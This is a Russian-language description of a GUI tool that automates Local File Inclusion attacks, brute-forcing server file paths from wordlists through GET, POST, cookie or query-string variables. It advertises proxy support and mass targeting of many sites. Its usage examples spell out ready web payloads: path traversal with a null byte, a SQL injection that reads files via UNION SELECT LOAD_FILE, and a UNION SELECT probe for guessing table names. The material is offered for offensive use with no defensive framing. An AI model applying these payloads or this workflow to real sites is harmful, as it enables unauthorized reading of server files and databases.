Данная утилита представляет из себя средство автоматизации при проведении атак класса LFI (Local File Including).
Функционал заключается в подборе файлов на удалённой машине по словарю путём подстановки локального url файла (например: ../../../../../../etc/httpd/conf/httpd.conf) в заданную HTTP-переменную.

Возможности
[+] Удобный GUI
[+] Поддержка HTTPS
[+] Поддержка прокси (HTTP/HTTPS)
[+] Настройка авторедиректов
[+] Возможность устрановки заголовка User-Agent
[+] Возможность устрановки задержки между попытками
[+] Возможность установки максимального скачиваемого размера страницы
[+] 4 метода атаки:
- Query String (для случаев с mod_rewrite)
- Get
- Post
- Cookie (Get)
[+] Возможность добавления в запрос дополнительных Post и Cookie переменных, которые будут автоматически добавляться в каждый запрос.
[+] Для подстановки имени файла используется макрос {STR}
[+] 2 варианта проверки на наличие файла:
- по поиску заданной строки в странице
- по изменению размера страницы
[+] Режим атака сразу нескольких сайтов
[+] Редактор настроек для атакуемых сайтов
- возможность детальной настройки каждого сайта в отдельности
- возможность загрузки списка атакуемых сайтов из файла
- автоматический парсинг URL (в URL каждого сайта должен присутствовать макрос {STR}
- целевая Get/Post/Cookie переменная передаются в программу одинаково - в виде обычной стоки запроса (http://site.com/?var={STR}), тип переменной указывается отдельно
[+] Можно использовать сразу несколько словарей (например словарь локаций php.ini + httpd.conf, и т.д.)
[+] Имеется возможность кодирования значения в Url или Hex (для атаки через SQL-инъекцию).

Примечания:
- Программа требует наличия .NET Framework >= 2.0

Примеры использования

1. Ищем файлы через LFI:
http://site.com/index.php?page=news&lang=[файл]%00

Настройки для брута будут такими:

Целевой URL: http://site.com/index.php?page=news
Метод: GET
Имя переменной: lang
Значение переменной: {STR}%00
Способ индикации: по размеру страницы

2. Ищем файлы через SQL-инъекцию:
http://site.com/index.php?id=-1+UNION+SELECT+1,LOAD_FILE([файл]),3--

Настройки:

Целевой URL: http://site.com/index.php
Метод: GET
Имя переменной: id
Значение переменной: -1+UNION+SELECT+1,LOAD_FILE({STR}),3--
Кодирование: Hex
Способ индикации: по размеру страницы

3. Ищем имя таблицы:
http://site.com/index.php?id=-1+UNION+SELECT+1,2,3+FROM+[таблица]--

Настройки:

Целевой URL: http://site.com/index.php
Метод: GET
Имя переменной: id
Значение переменной: -1+UNION+SELECT+31337,2,3+FROM+{STR}--
Способ индикации: Присутствие текста 31337